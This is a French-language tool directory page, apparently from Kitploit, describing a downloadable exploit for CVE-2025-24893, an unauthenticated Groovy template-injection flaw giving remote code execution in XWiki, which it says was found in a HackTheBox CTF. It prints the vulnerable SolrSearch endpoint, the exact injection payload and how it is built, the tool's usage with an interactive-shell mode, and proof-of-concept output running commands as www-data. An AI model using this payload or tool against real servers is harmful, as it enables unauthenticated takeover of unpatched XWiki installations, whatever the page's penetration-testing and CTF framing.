Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – Exploit RCE non authentifié par SSTI sur XWiki (HackTheBox CTF) | Kitploit
Outils/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'Intrusion
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – Exploit RCE non authentifié par SSTI sur XWiki (HackTheBox CTF)

Voir le dépôt
2il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893 — Exécution de code à distance par SSTI dans XWiki

Aperçu

ChampDétails
CVECVE-2025-24893
LogicielXWiki
VulnérabilitéInjection de modèle côté serveur (SSTI) → RCE
AuthentificationNon requise
Score CVSSCritique
ContexteDécouvert lors d'un CTF HackTheBox

Description

XWiki expose un point de terminaison SolrSearch (/xwiki/bin/get/Main/SolrSearch) qui traite les entrées fournies par l'utilisateur via le moteur de template Groovy sans assainissement. Un attaquant non authentifié peut injecter une expression Groovy via le paramètre de requête text, réalisant ainsi une exécution de code à distance sur le serveur sous-jacent.

Détails techniques

Point de terminaison vulnérable

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

Mécanisme d'injection

Le paramètre text est directement intégré dans un contexte de macro XWiki et évalué par le moteur Groovy. L'injection échappe le contexte du template en utilisant }}} et ouvre un bloc {{async}}{{groovy}} :

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

Le résultat est reflété dans le corps de la réponse RSS et peut être extrait via une expression régulière.

Structure de la charge utile

root@kitploit:~
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

La réponse est en XML/RSS — la sortie de la commande apparaît entre les marqueurs [}}} et ]</ avec des caractères encodés en HTML.

Utilisation

root@kitploit:~
python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]
DrapeauDescription
-tNom d'hôte ou IP cible
-pPort (défaut : 80)
-sUtiliser HTTPS
-iMode shell interactif
-cExécution d'une seule commande
-vSortie verbose

Exemples

root@kitploit:~
# Single command
python3 exploit.py -t wiki.target.htb -c "id"

# Interactive shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i

Dépendances

root@kitploit:~
pip install requests termcolor

Preuve de concept

root@kitploit:~
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Références

  • Avis officiel de XWiki
  • Entrée NVD
Télécharger l’outil